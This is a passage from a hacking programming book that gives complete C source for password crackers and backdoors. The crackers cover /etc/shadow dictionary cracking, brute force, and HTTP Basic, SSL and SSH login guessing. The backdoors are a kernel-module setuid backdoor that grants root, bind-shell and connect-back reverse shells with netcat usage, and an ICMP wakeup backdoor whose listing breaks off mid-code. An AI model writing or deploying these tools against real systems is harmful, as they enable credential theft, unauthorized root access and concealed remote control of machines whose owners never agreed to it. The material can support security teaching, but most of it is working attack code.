The program in Listing 10.1 later in this section recovers encrypted passwords stored in the /etc/shadow file using the dictionary method. (The most well-known program of this type is John the Ripper from a Russian hacker going by the nickname of Solar Designer.) There is no known way to take a hash and reverse the algorithm to derive the corresponding plain text password. There is, however, an easy way around this problem: Generate a hash for each word in the dictionary and compare it with a hash from the /etc/shadow file. If the hashes match, the corresponding dictionary word is the plain text password you are looking for.

Hashes can be generated using the standard crypt() function. (John the Ripper does not use this function, employing instead its own highly optimized algorithms.)

The crypt() function encrypts passwords using the DES or MD5 algorithms. Modern Linux systems mainly use the MD5 password-encryption algorithm; therefore, the password-cracking program will only work with hashes produced by this algorithm. The following is an example of an encrypted password from the /etc/shadow file on my system:

$1$mS0/Kuhj$2R3684d0jUE9Mpo5.9Bpn1


Passwords in the /etc/shadow file encrypted using the MD5 algorithm have the following structure:

$1$salt$hash


The hash is always preceded by a set of characters called the salt. The salt part always starts with the $1$ character sequence and ends with the $ character, with up to eight characters enclosed between these delimiters. The hash following the salt is a 22-character combination of uppercase and lowercase Latin letters, digits, and the period and slash characters.
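Because crypt() expects the salt in the $1$salt$ form, the cracker has to cut that prefix out of each /etc/shadow entry. Listing 10.1 does this with strtok(); the sketch below shows an alternative using strncmp() and strchr() that also checks the format. The helper name md5crypt_salt() and the sample hash in the test are made up for illustration.

```c
#include <string.h>

/* Hypothetical helper: copy the "$1$salt$" prefix of an MD5-crypt string
   into out (size outsz), in the form crypt() takes as its salt argument.
   Returns 0 on success, -1 if enc does not look like an MD5-crypt hash. */
static int md5crypt_salt(const char *enc, char *out, size_t outsz)
{
    if (strncmp(enc, "$1$", 3) != 0)
        return -1;                            /* Not an MD5-crypt hash   */

    const char *end = strchr(enc + 3, '$');   /* '$' that closes the salt */
    if (end == NULL || end - (enc + 3) > 8)
        return -1;                            /* Missing '$' or salt > 8 */

    size_t n = (size_t)(end - enc) + 1;       /* Keep the closing '$'    */
    if (n + 1 > outsz)
        return -1;                            /* Output buffer too small */

    memcpy(out, enc, n);
    out[n] = '\0';
    return 0;
}
```

With an 8-character salt the result is 12 characters long, which is why Listing 10.1 uses a 13-byte buffer for it.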

The crypt() function has the following syntax:

char *crypt(const char *key, const char *salt);


The first argument, the key, is the password to be encrypted; the second argument is a salt value. For DES encryption, the salt value is a 2-character combination of uppercase and lowercase Latin letters, digits, and the period and slash characters. For MD5 encryption, the salt value is specified as $1$salt$.

The file containing the encrypted password (it does not necessarily have to be named 
shadow) is passed to the program in the command line. The program itself is composed of 
two loops. The outer loop reads and parses each line from the encrypted password file, ex- 
tracting the encrypted password and then the salt value from the password. 

The inner loop processes each word in the dictionary file, which is the standard Linux 
/usr/share/dict/words dictionary. Each dictionary word is passed to the crypt () function with 
the salt value that was determined in the outer loop. The result produced by the crypt () 
function is compared with the encrypted password extracted in the outer loop. If they match, 
the current dictionary word is the suspected password and is output to the screen. 





Listing 10.1. A dictionary method password cracker (bruteshadow.c) 





#include <stdio.h>
#include <string.h>
#include <stdlib.h>
#include <unistd.h>
#include <crypt.h>    /* Declares crypt(); link with -lcrypt */

int main(int argc, char *argv[])
{
    FILE *fd1, *fd2;
    char *str1, *str2;
    char *salt, *hash, *key, *key1;
    char buf[13], word[100], pass[100];

    if (argc != 2) {
        fprintf(stderr, "Usage: %s <file shadow>\n", argv[0]);
        exit(-1);
    }

    // Preparing a line buffer in the heap
    str1 = (char *)malloc(100);

    // Opening the file with encrypted passwords
    if ((fd1 = fopen(argv[1], "r")) == NULL) {
        perror("fopen() failed");
        exit(-1);
    }

    fprintf(stderr, "Please, wait...\n");

    // Reading a line from the file per loop iteration
    while (fgets(str1, 100, fd1) != NULL)
    {
        // Looking for the $1$ characters in the line
        // (str2 points into str1, so it is not freed separately)
        str2 = strstr(str1, "$1$");

        // Finding the characters
        if (str2 != NULL)
        {
            // Extracting the encrypted password
            key = strtok(str2, ":");
            snprintf(pass, sizeof(pass), "%s", key);
            printf("pass=%s (%zu)\n", pass, strlen(pass));

            // Extracting the salt value from the encrypted password
            strtok(key, "$");
            salt = strtok(NULL, "$");
            hash = strtok(NULL, "\0");   // This operation can be omitted
            if (salt == NULL)
                continue;                // Malformed entry

            // Forming the salt as $1$salt$
            snprintf(buf, sizeof(buf), "$1$%s$", salt);

            // Opening the dictionary file
            if ((fd2 = fopen("/usr/share/dict/words", "r")) == NULL) {
                perror("fopen() failed");
                exit(-1);
            }

            // Reading a dictionary word per loop iteration
            while (fgets(word, 100, fd2) != NULL)
            {
                // Stripping the new-line character
                word[strcspn(word, "\n")] = '\0';

                // Calculating the new encrypted password
                key1 = crypt(word, buf);

                // Comparing both encrypted passwords
                if (key1 != NULL && !strncmp(key1, pass, strlen(key1))) {
                    printf("OK! The password is: %s\n\n", word);
                    break;
                }
            }

            fclose(fd2);
        }
    }

    fclose(fd1);
    free(str1);

    return 0;
}





10.1.2. Using the Brute-Force Method 


The program shown in Listing 10.2 recovers passwords using the brute-force method. Its operating principle is similar to that of the interlocked gears used in older mechanical odometers. When the first gear makes a full turn, it catches the adjacent gear and turns it one position. The second gear does the same thing, and so on. Just like the first gear, the code for the first password character is incremented until it reaches the maximum value. When this happens, it is reset to the starting value, and the code for the next character is incremented by one. Being just an example program, it has no bells and whistles and simply outputs candidate passwords in an endless loop.


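Listing 10.2. The brute-force password cracker (brutesymbol.c)

#include <stdio.h>

int main()
{
    char pswd[100] = " ";   /* Current candidate; starts as a single space */
    int p;

    while (1) {             /* Endless loop */
        printf("%s\n", pswd);

        /* Incrementing the first character; when it passes '~', it is
           reset to ' ' and the carry moves to the next position */
        p = 0;
        while (++pswd[p] > '~')
        {
            pswd[p] = ' ';
            p++;
            if (!pswd[p])
            {
                /* All positions overflowed: adding one more character.
                   It is set to ' ' - 1 so that the increment in the loop
                   condition turns it into ' ' */
                pswd[p] = ' ' - 1;
                pswd[p + 1] = 0;
            }
        }
    }

    return 0;
}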





10.2. Remote Password Crackers 


Remote password crackers are used for guessing passwords for remote services, such as telnet, 
FTP, SSH, and POP3, as well as for Web server resources over HTTP/HTTPS. The general 
operation procedure of any remote password cracker consists of three steps:

1. A connection with a remote host is established.
2. An authentication request is sent to the remote service according to the rules of the given service.
3. The answer from the remote service is examined; if it says that the authentication was successful, the correct password was guessed.




Web servers employ numerous authentication methods, such as the following:

Basic authentication
NT LAN Manager (NTLM) authentication
Authentication using an HTML form
I first show how to construct a remote password cracker for Web resources protected with basic authentication and then modify this program to support the secure sockets layer (SSL) protocol. Next, I consider another password cracker, this one for SSH service logins and passwords. You can use these programs as examples to devise password crackers for other services on your own. You will just have to obtain the necessary RFC and implement the authentication method it describes in your password cracker.


10.2.1. Basic HTTP Authentication 


In basic authentication, when a user tries to connect to a protected resource, the browser displays a window in which the user must enter the login and password (Fig. 10.1). The authentication window may look different on different systems.











Fig. 10.1. The basic authentication dialog window


Consider the typical exchange processes taking place between a client and the server using 
basic authentication on the HTTP level. For example, suppose that the /admin/ resource on 
Web server 192.168.10.1 is protected by basic authentication. Access it in the regular way: 

GET /admin/ HTTP/1.1 

Host:192.168.10.1 

This produces the following lines in the header of the Web server's reply: 

HTTP/1.1 401 Authorization Required 

WWW-Authenticate: Basic realm="Administrator access only!" 

That is, the Web server indicates that authentication is required to access the given resource. When the Web browser receives this reply, it displays a window for entering the login and password. The user enters the login and password into the appropriate fields and clicks the OK button; the browser then sends the following request:

GET /admin/ HTTP/1.1 


Host: 192.168.10.1
Authorization: Basic c2tseWFyb2ZmOml2YW4=
As you can see, the regular request simply has the Authorization line added to it. When the Web server receives this request, it either denies access to the resource with a message that the entered login or password is invalid or, if the login and password are correct, grants access to the resource. When basic authentication is employed, logins and passwords are sent in the login:password format, encoded (not encrypted) with the Base64 algorithm. The c2tseWFyb2ZmOml2YW4= string in the preceding sample request is the Base64-encoded sklyaroff:ivan string.
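Listing 10.3 decides whether a guess succeeded by searching the reply for the "200 OK" string. A slightly stricter alternative is to read the numeric status code from the status line, so that 401 (credentials rejected) and 200 (access granted) are told apart regardless of the reason phrase the server uses. The helper http_status() below is a hypothetical sketch, not part of the book's program.

```c
#include <stdio.h>

/* Hypothetical helper: extract the status code from the first line of an
   HTTP reply, e.g. "HTTP/1.1 401 Authorization Required".
   Returns the code, or -1 if the reply does not start with a status line. */
static int http_status(const char *reply)
{
    int major, minor, code;

    if (sscanf(reply, "HTTP/%d.%d %3d", &major, &minor, &code) != 3)
        return -1;
    return code;
}
```

A cracker would then treat 200 as success and 401 as a rejected login:password pair; other codes (e.g., redirects) need a closer look.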

The login and password are automatically encoded by the browser before it sends them to the Web server. Thus, your password cracker must encode each login:password pair with the Base64 algorithm. Unfortunately, the C standard library does not have a function to handle this task, so a custom function, named base64Encode(), is used (Listing 10.3).

The program uses two files to form the login:password pair: The users.txt file contains logins, and the words.txt file holds potential passwords. Both of these files can be found in the /PART II/Chapter 10 directory on the accompanying CD-ROM.





Listing 10.3. A basic authentication password cracker (brutebase64.c) 


#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

#define USER    "users.txt"
#define PASS    "words.txt"
#define CATALOG "/admin/"

static char table64[] =
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";

char *port_host;
char *name;

/* Splitting a host[:port] argument into the host name and the port */
void token(char *arg)
{
    name = strtok(arg, ":");
    port_host = strtok(NULL, "");

    if (port_host == NULL)
        port_host = "80";
}

/* Base64-encoding the intext string into output */
void base64Encode(char *intext, char *output)
{
    unsigned char ibuf[3];
    unsigned char obuf[4];
    int i;
    int inputparts;

    while (*intext) {
        for (i = inputparts = 0; i < 3; i++) {
            if (*intext) {
                inputparts++;
                ibuf[i] = *intext;
                intext++;
            }
            else
                ibuf[i] = 0;
        }

        obuf[0] = (ibuf[0] & 0xFC) >> 2;
        obuf[1] = ((ibuf[0] & 0x03) << 4) | ((ibuf[1] & 0xF0) >> 4);
        obuf[2] = ((ibuf[1] & 0x0F) << 2) | ((ibuf[2] & 0xC0) >> 6);
        obuf[3] = ibuf[2] & 0x3F;

        switch (inputparts) {
        case 1: /* Only 1 byte read */
            sprintf(output, "%c%c==",
                    table64[obuf[0]],
                    table64[obuf[1]]);
            break;
        case 2: /* 2 bytes read */
            sprintf(output, "%c%c%c=",
                    table64[obuf[0]],
                    table64[obuf[1]],
                    table64[obuf[2]]);
            break;
        default:
            sprintf(output, "%c%c%c%c",
                    table64[obuf[0]],
                    table64[obuf[1]],
                    table64[obuf[2]],
                    table64[obuf[3]]);
            break;
        }
        output += 4;
    }
    *output = 0;
}

int main(int argc, char **argv)
{
    FILE *fd1, *fd2;
    int sd, bytes;
    char buf1[250], buf2[250];
    char buf[250];
    char str1[270], str2[1000];
    struct hostent *host;
    struct sockaddr_in servaddr;
    char rez[2000];
    char c[600];

    if (argc < 2 || argc > 3) {
        fprintf(stderr, "Usage: %s host[:port] [proxy][:port]\n\n", argv[0]);
        exit(-1);
    }

    /* With a proxy, the connection is made to the proxy */
    if (argc == 3)
        token(argv[2]);
    else
        token(argv[1]);

    if ((host = gethostbyname(name)) == NULL) {
        herror("gethostbyname() failed");
        exit(-1);
    }

    memset(&servaddr, 0, sizeof(servaddr));
    servaddr.sin_family = AF_INET;
    servaddr.sin_port = htons(atoi(port_host));
    servaddr.sin_addr = *((struct in_addr *)host->h_addr);

    if ((fd1 = fopen(USER, "r")) == NULL) {
        perror("fopen() failed");
        exit(-1);
    }

    /* Outer loop: logins */
    while (fgets(buf1, 250, fd1) != NULL)
    {
        buf1[strcspn(buf1, "\r\n\t")] = 0;
        if (strlen(buf1) == 0) continue;

        if ((fd2 = fopen(PASS, "r")) == NULL) {
            perror("fopen() failed");
            exit(-1);
        }

        /* Inner loop: passwords */
        while (fgets(buf2, 250, fd2) != NULL)
        {
            buf2[strcspn(buf2, "\r\n\t")] = 0;
            if (strlen(buf2) == 0) continue;

            snprintf(c, sizeof(c), "%s:%s", buf1, buf2);
            base64Encode(c, rez);

            if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
                perror("socket() failed");
                exit(-1);
            }

            if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) {
                perror("connect() failed");
                exit(-1);
            }

            if (argc == 2)
                snprintf(str1, sizeof(str1), "GET %s HTTP/1.1\r\n", CATALOG);
            else
                snprintf(str1, sizeof(str1), "GET http://%s%s HTTP/1.1\r\n", argv[1], CATALOG);

            snprintf(str2, sizeof(str2), "Host:%s\r\nAuthorization: Basic %s\r\n\r\n", argv[1], rez);

            send(sd, str1, strlen(str1), 0);
            send(sd, str2, strlen(str2), 0);

            memset(buf, 0, sizeof(buf));
            bytes = recv(sd, buf, sizeof(buf) - 1, 0);
            if (bytes < 0)
                bytes = 0;
            buf[bytes] = 0;

            if (strstr(buf, "200 OK") != NULL) {
                printf("%s", str1);
                printf("%s\n", str2);
                printf("Result OK: %s\n", c);
            }

            close(sd);
        }

        fclose(fd2);
    }

    fclose(fd1);

    return 0;
}





10.2.2. An SSL Password Cracker


The SSL protocol is used to create a secure connection between a client and the server. This protocol is often used to encrypt HTTP, resulting in secure HTTP (HTTPS). HTTPS service is usually provided on TCP port 443. There are several SSL protocol versions, as well as similar protocols, such as the transport layer security (TLS) protocol defined in RFC 2246. At the time the material for this book was being prepared, three SSL protocol versions existed: SSLv1, SSLv2, and SSLv3. SSLv1 was never publicly released because of its security flaws. The password cracker I offer for your consideration works only with SSLv2, but the differences in programming for different SSL versions are minor. (Note that current OpenSSL releases no longer support SSLv2 at all.) The source code for the program for cracking HTTPS logins and passwords, named brute_ssl.c, can be found on the accompanying CD-ROM. Basic HTTP authentication is used in the program. This is the same program as shown in Listing 10.3 but with SSL support. The program uses the OpenSSL library; therefore, you must have this library installed on your computer. You can obtain this library at http://www.openssl.org; also, any full-featured Linux distribution includes it. Installing the library is a straightforward process, so I don’t describe it here.
A program with SSL support must include the openssl/ssl.h header file; it is compiled using the -lssl flag (on many systems, -lcrypto must be added as well):

# gcc brute_ssl.c -o brute_ssl -lssl -lcrypto

To write an SSL client, all you have to do is use OpenSSL functions in the program. The first step is to initialize the OpenSSL library:


SSL_METHOD *method;
SSL_CTX *ctx;
SSL *ssl;

OpenSSL_add_all_algorithms();     /* Loading all encryption algorithms */
SSL_load_error_strings();         /* Loading and registering error message tables */

method = SSLv2_client_method();   /* Creating a client method */
ctx = SSL_CTX_new(method);        /* Creating a context */


Then a regular socket is created and a regular connection to the server established: 


if ((sd = socket(PF_INET, SOCK_STREAM, 0)) < 0) {
    perror("socket() failed");
    exit(-1);
}

if (connect(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)) == -1) {
    perror("connect() failed");
    exit(-1);
}


After a regular connection is established, an SSL connection is created and linked to the 
regular connection: 


ssl = SSL_new(ctx);                  /* Creating an SSL connection */
SSL_set_fd(ssl, sd);                 /* Linking the socket descriptor */
if (SSL_connect(ssl) != 1)           /* Establishing a connection */
    ERR_print_errors_fp(stderr);     /* Outputting error messages into the stderr stream */

When an SSL connection is created, data can be exchanged by calling the SSL_write() and SSL_read() functions, much as the send() and recv() functions are used with a regular socket:

int bytes;
bytes = SSL_write(ssl, str1, strlen(str1));     /* Encrypting, sending */
bytes = SSL_read(ssl, buf, sizeof(buf) - 1);    /* Receiving, decrypting */


10.2.3. An SSH Password Cracker 


The SSH protocol is a secure replacement for such protocols as telnet and rlogin. SSH provides good protection against eavesdropping on the connection between a client and the server, but it offers no protection against password cracking. The source code for a program for cracking SSH server logins and passwords, named brute_ssh.c, can be found on the accompanying CD-ROM. You will need the libssh library installed on your computer to compile this program.
This library can be obtained at http://0xbadc0de.be/libssh/libssh-0.11.tgz. It is installed by executing the following command sequence:

# tar zxf libssh-0.11.tgz
# cd libssh-0.11
# ./configure
# make
# make install


After the installation, copy the library’s shared object file to the /usr/lib directory; otherwise, the compiled program will refuse to run. To do this, execute the following command:

# cp /usr/local/lib/libssh.so /usr/lib/

A program with SSH support must include the libssh/libssh.h header file; it is compiled using the -lssh flag:

# gcc brute_ssh2.c -o brute_ssh2 -lssh


The program only works with SSHv2 because SSHv1 has serious security flaws and is 
rarely used. At the time the material for this book was being prepared, SSHv2 was the high- 
est version. 

To write an SSH client, all you have to do is use functions from the libssh library in the program. All functions are described in the API.html file, which is included in the library archive.

First, the connection options must be set:


char login[250], pass[250];
SSH_SESSION *ssh_session;
SSH_OPTIONS *ssh_opt;

/* Initializing a new pointer to the options */
ssh_opt = options_new();

/* For later use, the server address must be converted from the network
   (binary) format to the dotted-decimal a.b.c.d format */
buf = malloc(20);
inet_ntop(AF_INET, &servaddr.sin_addr, buf, 20);

/* The stream from the client to the server need not be compressed */
options_set_wanted_method(ssh_opt, KEX_COMP_C_S, "none");

/* The stream from the server to the client need not be compressed */
options_set_wanted_method(ssh_opt, KEX_COMP_S_C, "none");

/* Setting the server port (standard port 22) */
options_set_port(ssh_opt, PORT);

/* Setting the server name */
options_set_host(ssh_opt, buf);

/* Setting the login */
options_set_username(ssh_opt, login);


Next, a connection with the SSH server is established: 


if ((ssh_session = ssh_connect(ssh_opt)) == NULL) {
    fprintf(stderr, "Connection failed: %s\n", ssh_get_error(ssh_session));
    exit(-1);
}

If the connection is established successfully, authentication is performed. After successful authentication, the ssh_userauth_password() function returns SSH_AUTH_SUCCESS (previous versions of the libssh library use constants without the SSH_ prefix, i.e., simply AUTH_SUCCESS):

if (ssh_userauth_password(ssh_session, login, pass) == SSH_AUTH_SUCCESS) {
    fprintf(stderr, "OK! login: %s, password: %s\n", login, pass);
}

Thus, the password cracker calls the ssh_userauth_password() function in a loop and in each loop iteration specifies a new login and password, which are taken from the users.txt and words.txt files.

Note that the program does not have to create a standard socket and connect to the server
using the connect() function. The socket address structure (struct sockaddr_in) is nevertheless
filled to obtain the server's IP address in network format, which is then converted
to the dotted-decimal a.b.c.d format.

The source codes for all programs in this section can be found in the /PART II/Chapter 10
directory on the accompanying CD-ROM.


10.2.4. Cracking HTML Form Authentication 


Unlike most authentication methods, authentication employing an HTML form does not follow
a standardized authentication scheme; the form data are simply carried over HTTP or HTTPS.
Therefore, there is no standard way of implementing this authentication method. This may make
the task of creating a password cracker for HTML form authentication seem difficult. Because
this is the most common authentication method used on the Internet, it deserves separate
attention. I do not give a detailed recipe for implementing a password cracker for this
authentication method; I just describe how to do this.

The HTML form authentication is based on a form created using the <FORM> and <INPUT>
HTML tags. The exact details of the process can be found in any HTML textbook. The
<INPUT> tag creates input fields for entering the login and password. After the user enters
these data into the fields on the form, they are sent by the GET or POST method to the server
using HTTP or HTTPS. There, the data are processed by a script written in Perl, PHP, Python,
or some other Web language. Based on the results produced by the script, the remote user is
either allowed access to the protected resource or, if an invalid login or password was supplied,
denied it.

Thus, a password cracker must form a proper request to the script on the server and send 
it using the GET or POST method, with a new login and password supplied for each request.
Because there can be multiple combinations of the form’s field names, data sending methods 
used (GET or POST), and script names, either the user must pass these data to the password 
cracker or the utility must be able to analyze the form page and determine all necessary 
parameters by itself. (The latter approach is taken by the most powerful password crackers.) 
The following is an example of a typical GET request: 

GET /cgi-bin/login.cgi?user=ivan&pass=sklyaroff HTTP/1.1
Host: 192.168.10.1

In this example, the form has two fields: user and pass. The login and password are
checked using the /cgi-bin/login.cgi server script, which is passed ivan as a login and 
sklyaroff as a password. 

The main difficulty, however, is establishing when the correct login and password have been
found. Regardless of whether the authentication is successful or not, the server usually
replies with an HTML page. This means that the password cracker cannot determine success by
analyzing the HTTP response header, because in both cases its status line will contain 200 OK.
Thus, the only reliable way of determining successful authentication is to specify a word or 
a phrase that the successful authentication HTML reply page is expected to contain and 
a word or a phrase for the unsuccessful authentication HTML reply page. In this way, the 
password cracker can analyze the returned page and, by the absence or presence of the prede- 
fined word or phrase, can determine whether the authentication was successful. This approach 
is taken in most password cracking programs for HTML form authentication. 






Chapter 11: Trojans and Backdoors





Trojans and backdoors are practically the same type of hacker tools, used to create a secret
doorway to a system. The Trojan name is used when a backdoor utility is camouflaged as an
innocent program, by analogy with the legendary Trojan horse. Users running such a seemingly
harmless program let an enemy into their system themselves. From now on, only the term
backdoor will be used to denote both types of this software.

All backdoors can be divided into two types: local and remote. A local backdoor grants 
privileges of some sort on a local machine. A remote backdoor allows access to the command 
interpreter on a remote machine. 

Sometimes a backdoor program can be created by simply modifying a legitimate program
slightly. For example, such services as telnet, SSH, and rlogin can be recompiled with
built-in magic passwords. Other programs, daemons, and even libraries can be similarly
changed. Backdoors of this type are not considered in this book because they are quite
primitive and implementing them requires only basic programming skills.


11.1. Local Backdoors 


Listing 11.1 shows the source code for a simple local backdoor, which is a loadable kernel
module (LKM) for the version 2.4.x Linux kernels. (Kernel module programming is considered
in Chapter 18.) This backdoor intercepts the setuid() system call so that any process calling
setuid(31337) is automatically granted system administrator privileges (uid = 0 and gid = 0).

Listing 11.1. A local LKM backdoor (bdmod.c)





/* Module backdoor for Linux 2.4.x */
#define __KERNEL__
#define MODULE

#include <linux/config.h>
#include <linux/module.h>
#include <linux/version.h>
#include <sys/syscall.h>
#include <linux/sched.h>
#include <linux/types.h>

/* Declaring the system call table (exported by 2.4.x kernels) */
extern void *sys_call_table[];

/* Defining a pointer for saving the original call */
int (*orig_setuid)(uid_t);

/* Creating a custom function for the system call */
int change_setuid(uid_t uid)
{
    if (uid == 31337)
    {
        current->uid = 0;   // Real user ID
        current->euid = 0;  // Effective user ID
        current->gid = 0;   // Real group ID
        current->egid = 0;  // Effective group ID
        return 0;
    }
    /* If UID != 31337, call the original setuid(). */
    return (*orig_setuid)(uid);
}

int init_module(void)
{
    /* Saving the pointer to the original call */
    orig_setuid = sys_call_table[__NR_setuid32];
    /* Replacing the pointer in the system calls table */
    sys_call_table[__NR_setuid32] = change_setuid;
    return 0;
}

void cleanup_module(void)
{
    /* Restoring the original system call pointer */
    sys_call_table[__NR_setuid32] = orig_setuid;
}
11.2. Remote Backdoors


Based on their operating principle, remote backdoors are divided into two types: bind shell 
and connect back. A bind shell backdoor simply opens access to a command shell through 
a certain port and listens for the hacker to connect. A connect back backdoor does not listen for 
a connection but itself tries to connect to the client through a certain port. The reason for
connect back backdoors is that firewalls often block incoming connections to nonstandard ports;
because bind shell backdoors usually use nonstandard ports, access to such a backdoor may be 
blocked by the firewall. Connect back backdoors get around firewalls because they use outgoing 
connections, which are seldom blocked by firewalls. 

I consider both types of backdoors, as well as another type of remote backdoor, called
a wakeup backdoor.


11.2.1. Bind Shell 


The source code for a bind shell backdoor is shown in Listing 11.2 later in this section. As you
can see, this backdoor is a simple server application. When the backdoor is started, the port
for the backdoor to listen on can be specified as a command-line argument. By default, the
backdoor opens port 31337. The port is bound to a TCP stream socket by filling a socket address
structure and calling the bind() function. The listen() function places the socket in a state
in which it listens for incoming connections. The server process blocks when the accept()
function is called and waits for the client to connect. When a connection is established,
accept() returns cli, the descriptor of the connected socket. Then dup2() is called three
times to bind the stdin (0), stdout (1), and stderr (2) standard streams to the cli
descriptor, and a shell is started by calling the execl() function.

You may have never dealt with the daemon() function before, which is called at the beginning
of the backdoor code. It detaches the program from its controlling terminal and runs it
as a system daemon. To do this, the function spawns a new process with fork(); if fork()
succeeds, the parent process exits so that only the child continues to run, and the child
calls setsid() to start a new session. If the first argument of daemon() (nochdir) is zero,
the function makes the root (/) directory current. If the second argument (noclose) is zero,
the function redirects the standard input, output, and error streams to /dev/null. The complete
information can be found in man daemon.

The created backdoor can be tested on the local machine: 

# gcc bindshell.c -o bindshell 

# ./bindshell 10000 

Now, you can connect to the backdoor using a telnet client or the netcat utility: 


# telnet 127.0.0.1 10000
Trying 127.0.0.1...
Connected to 127.0.0.1.
Escape character is '^]'.
ls -l;
total 32
-rwx------ 1 root root  1325 Jul 24 05:45 bd_icmp.c
-rwxr-xr-x 1 root root 14762 Jul 24 07:06 bindshell
-rwx------ 1 root root   677 Jul 24 04:27 bindshell.c
-rwx------ 1 root root   678 Jul 24 04:31 conback.c
-rwx------ 1 root root  2389 Jul 24 05:41 icmpsend.c
: command not found


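If a telnet client is used, each entered command must terminate with a semicolon. Telnet ends
every line with a carriage return and a line feed, so the shell receives a stray carriage return
after the command. The semicolon separates it from the command, so the command runs and the lone
carriage return only produces the harmless ": command not found" message shown above.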





Listing 11.2. A bind shell backdoor (bindshell.c) 





#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int sd, cli, port;
    struct sockaddr_in servaddr;
    port = 31337;

    daemon(1, 0);
    if (argc != 1) port = atoi(argv[1]);

    servaddr.sin_family = AF_INET;
    servaddr.sin_addr.s_addr = INADDR_ANY;
    servaddr.sin_port = htons(port);

    sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (bind(sd, (struct sockaddr *)&servaddr, sizeof(servaddr)))
        perror("bind() failed");

    listen(sd, 1);

    cli = accept(sd, NULL, 0);
    dup2(cli, 0);
    dup2(cli, 1);
    dup2(cli, 2);
    execl("/bin/sh", "sh", (char *)NULL);
    return 0;
}





11.2.2. Connect Back 


The source code for this backdoor is shown in Listing 11.3. This backdoor is a regular client
that uses the connect() function to connect to the IP address and port specified on the
command line.

The client must listen for the backdoor to connect; that is, it works as a server. Otherwise,
the backdoor will not be able to make a connection. The netcat utility is switched
into listening mode by running it with the -l (listen mode) and -p (port number) options:

# nc -l -p 5555

The preceding command makes the netcat utility listen on port 5555. The created
backdoor can be tested on the local machine by starting it in another terminal window as
follows:

# ./conback 127.0.0.1 5555

The backdoor will connect to port 5555, which will allow commands to be executed through the
netcat utility started earlier:


total 32
-rwx------ 1 root root  1325 Jul 24 05:45 bd_icmp.c
-rwxr-xr-x 1 root root 14762 Jul 24 07:06 bindshell
-rwx------ 1 root root   677 Jul 24 04:27 bindshell.c
-rwx------ 1 root root   678 Jul 24 04:31 conback.c
-rwx------ 1 root root  2389 Jul 24 05:41 icmpsend.c





Listing 11.3. The connect back backdoor (conback.c) 





#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
    int sd;
    struct sockaddr_in serv_addr;

    if (argc != 3) {
        printf("Usage: %s <ip> <port>\n", argv[0]);
        exit(-1);
    }

    daemon(1, 0);

    serv_addr.sin_family = AF_INET;
    serv_addr.sin_addr.s_addr = inet_addr(argv[1]);
    serv_addr.sin_port = htons(atoi(argv[2]));

    sd = socket(PF_INET, SOCK_STREAM, 0);

    if (connect(sd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0)
        perror("connect() failed");

    dup2(sd, 0);
    dup2(sd, 1);
    dup2(sd, 2);

    execl("/bin/sh", "sh", (char *)0);
    return 0;
}
11.2.3. Wakeup Backdoor


The wakeup backdoor is not detected by the netstat utility or port scanners. It is possible 
because ICMP does not use network ports and any ICMP messages are handled by the IP sub- 
system. After a wakeup backdoor is started, it creates an ICMP raw socket and waits for a spe- 
cial ICMP packet, called the wakeup packet, without opening a port. When it receives the 
wakeup packet, the backdoor creates a regular TCP or UDP socket and listens on the port 
specified in the wakeup packet for incoming messages. After the messages are received and the 
session is closed, the port is closed and the backdoor again becomes invisible to port scanners 
and the netstat utility. Because a wakeup backdoor creates a raw socket, unlike regular back- 
doors it needs root privileges to run. 

In essence, a wakeup backdoor is a bind shell or a connect back backdoor with a special 
wakeup mechanism added to it. Thus, I only consider the bind shell wakeup backdoor 
(Listing 11.4), which you can easily modify to be a connect back backdoor. 

To send the wakeup packet, the icmpsend utility is used (Listing 11.5). For waking up, some 
wakeup backdoors use the ping utility run with the -p option, which allows data to be sent. 

You can find source codes for numerous wakeup backdoors at 
http://m00.blackhat.ru/m00-archive.tar.bz2. 

Consider the backdoor program in Listing 11.4. To receive the wakeup ICMP packet, the
program uses the malloc() function to allocate a heap buffer whose size is the sum of the sizes
of the IP and ICMP headers.

Then an endless loop is started, in which a raw socket for receiving ICMP packets is created.
Packets are received in a nested loop using the recv() function until the value of
the Identifier field (icmp.icmp_id) becomes 0xABCD. Basically, this value is what wakes
the backdoor up; you can choose another value. As soon as a packet with this value
arrives, the nested loop terminates and the fork() function is called to spawn a child process.
The actions carried out in the child process are analogous to those considered
in Section 11.2.1, the only difference being that the port number is taken from the
Sequence Number field (icmp.icmp_seq) of the received ICMP packet. The parent process
closes the ICMP raw socket and calls the waitpid() function to wait for the child process to
finish; together with signal(SIGCHLD, SIG_IGN), this prevents zombie processes.


Listing 11.4. The wakeup backdoor (bd_icmp.c) 


#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <unistd.h>
#include <signal.h>

int main(int argc, char *argv[])
{
    struct ipacket {
        struct iphdr ip;
        struct icmp icmp;
    } *packet;

    int isock, sd, cli;
    int pid;
    struct sockaddr_in servaddr;

    daemon(0, 0);

    packet = (struct ipacket *) malloc(sizeof(struct iphdr) +
                                       sizeof(struct icmp));

    signal(SIGCHLD, SIG_IGN);

    while (1) {

        if ((isock = socket(PF_INET, SOCK_RAW, IPPROTO_ICMP)) < 0) {
            perror("isock socket() failed");
            exit(-1);
        }

        while (packet->icmp.icmp_id != 0xABCD) {
            recv(isock, packet, sizeof(struct ipacket), 0);
        }

        if ((pid = fork())) {
            close(isock);
            waitpid(pid, NULL, 0);
        } else {
            servaddr.sin_family = AF_INET;
            servaddr.sin_addr.s_addr = INADDR_ANY;
            servaddr.sin_port = htons(packet->icmp.icmp_seq);
            sd = socket(PF_INET, SOCK_STREAM, IPPROTO_TCP);
